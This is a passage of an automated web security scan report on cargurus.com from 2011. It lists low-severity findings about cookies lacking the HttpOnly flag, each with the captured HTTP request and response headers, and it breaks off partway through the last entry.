Request

GET /Cars/jsonBannerAds.action?jumpstartAdFormats=MEDIUM_RECTANGLE&entity=t31743&adPageUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26ign-modelId-entitySelectingHelper.selectedEntity%3D%26entitySelectingHelper.selectedEntity%3Dm4%26zip%3D02110%26sourceContext%3DcarGurusHomePage_false_0%23listing%3D24317110 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=6CEBADA839E3934DE348354410DCAE3B.www13; Path=/Cars
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:17 GMT
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 1851

{"jsAdsMap":{"MEDIUM_RECTANGLE":"\n\r\n\n\r\n\n\n\n\n<img src=\"/Cars/ping/doubleClickBannerAd?jumpstartRequestUrl=http%3A%2F%2Fad.doubleclick.net%2Fpfadx%2Fguru.used.dfp%2Fbg%2Fmod%2Ftl%3Bdcmt%3Dtext
...[SNIP]...

3.3. http://www.cargurus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:12:44 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:12:44 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 59071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://
...[SNIP]...

3.4. http://www.cargurus.com/Cars/getModelList.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/getModelList.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/getModelList.action?showInactive=false&maker=m4&newCarsOnly=false&quotableOnly=false&useInventoryService=true&carsWithRegressionOnly=false HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:00 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:00 GMT
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 139

A=d191=CL;A=d36=Integra;A=d37=Legend;A=d16=MDX;A=d17=NSX;A=d921=RDX;A=d18=RL;A=d3=RSX;A=d192=SLX;A=d19=TL;A=d20=TSX;A=d38=Vigor;A=d2065=ZDX

3.5. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action?sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
Content-Length: 352
Origin: http://www.cargurus.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Coyote-2-c0a8020a=c0a8021e:0; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

zip=02110&address=Boston%2C+MA&latitude=42.359&longitude=-71.058&distance=MILES_75&selectedEntity=m4&entitySelectingHelper.selectedEntity2=&minPrice=null&maxPrice=null&minMileage=null&maxMileage=null&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Set-Cookie: cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/Cars/
Set-Cookie: cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; Expires=Fri, 16-Sep-2016 13:13:11 GMT; Path=/
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Version=1; Max-Age=7776000; Expires=Sat, 17-Dec-2011 13:13:11 GMT; Path=/
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: application/json;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 398062

{"sellers":[{"proximity":49.76031516231796,"id":229914,"longitude":-71.00540161132812,"sellerType":"Dealer","latitude":41.63990020751953},{"proximity":15.783690606699704,"id":209526,"longitude":-70.94
...[SNIP]...

3.6. http://www.cargurus.com/Cars/inventorylisting/priceAnalysis.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/priceAnalysis.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/inventorylisting/priceAnalysis.action?inventoryListing=24317110&zip=02110&distance=MILES_75 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:17 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 1425

{"avgLine":[[16000,24792.426803453418],[93022,17904.134562963693]],"mileage":19849,"price":20900,"nearbyListingPoints":[[63451,18491],[27759,20900],[38132,20995],[29914,21790],[43917,22888],[32737,229
...[SNIP]...

3.7. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:09 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Expires=Fri, 16-Sep-2016 13:13:09 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 143496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...

3.8. http://www.cargurus.com/Cars/ping/doubleClickBannerAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/ping/doubleClickBannerAd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/ping/doubleClickBannerAd?jumpstartRequestUrl=http%3A%2F%2Fad.doubleclick.net%2Fpfadx%2Fguru.new.dfp%2Fbg%2Fmak%2Facura%3Bdcmt%3Dtext%2Fxml%3Bprod%3Dmake%3Bsection%3Dbuyers_guide%3Bmak%3Dacura%3Bsz%3D728x90%3Bu%3Dsection_buyers_guide%257cprod_make%257cmak_acura%257csz_728x90%257c%3Bdcove%3Dd%3Bdcopt%3Dist%3Btile%3D1%3Bord%3D473378449%3F&isPaidAd=true&versionId=1642868798 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: image/png;charset=ISO-8859-1
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 177

.PNG
.
...IHDR.....................sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....tEXtSoftware.Paint.NET v2.72rZ.]....IDAT.Wc....    ...+..E....IEND.B`.

3.9. http://www.cargurus.com/Cars/serveJumpstartAd.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/serveJumpstartAd.action

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/serveJumpstartAd.action?bannerOrd=473378449&adSenseHints=Acura&adSenseChannel=5696859814 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 2492


<html>
   <head>
        <base href="http://ad.doubleclick.net/">
       
   </head>

   <body>

   <div class="jumpstartAd">
    <script type="text/javascript">
function pr_swfver(){
var osf,osfd,i
...[SNIP]...

3.10. http://www.cargurus.com/Cars/track  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/track

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cars/track?url=&pid=InventoryListingResults&totalUniqueListings=423&selectedEntityId=m4&postalCode=02110&sourceContext=carGurusHomePage_false_0&displayedListings=423&featuredListings=undefined&standardListings=423&Dealix=73&CarsDotCom=147&AutoUSA=136&AutoByTel=17&CarsDirect=29&Vehix=13&GroupOne=6&DetroitTrading=2 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:13 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 0


3.11. http://www.cargurus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:12:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Aug 2008 22:35:40 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 3638
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

..............h...&... ..............(....... ...........@.....................................N...........n...5...........\...&...C...|...............+...8...e...r...........K...................-...
...[SNIP]...

3.12. http://www.cargurus.com/gfx/icons/silk/help.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /gfx/icons/silk/help.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gfx/icons/silk/help.png HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Feb 2011 02:00:20 GMT
Accept-Ranges: bytes
Content-Length: 786
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:17 GMT
Content-Type: image/png
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

.PNG
.
...IHDR................a....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8....O.a...[.Oh..j.j...8.....'..r....t..,)53.
j....o.".&.. .b"_..Dx.U....5...Z...{....g... ..c.#..Z..@..'
...[SNIP]...

3.13. http://www.cargurus.com/gfx/icons/silk/star.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /gfx/icons/silk/star.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gfx/icons/silk/star.png HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 12 Sep 2011 17:32:52 GMT
Accept-Ranges: bytes
Content-Length: 670
Cache-Control: max-age=31536000
Expires: Mon, 17 Sep 2012 13:13:17 GMT
Content-Type: image/png
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/

.PNG
.
...IHDR................a....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...0IDAT8....K.Q...{...3...ch..T~4.h..a"m..B..U.h....?..EmZ....l.Q`%.. .u.c....|.....BM...........p...t....s`.....
...[SNIP]...

3.14. http://www.cargurus.com/gfx/mini/star.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /gfx/mini/star.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gfx/mini/star.gif HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
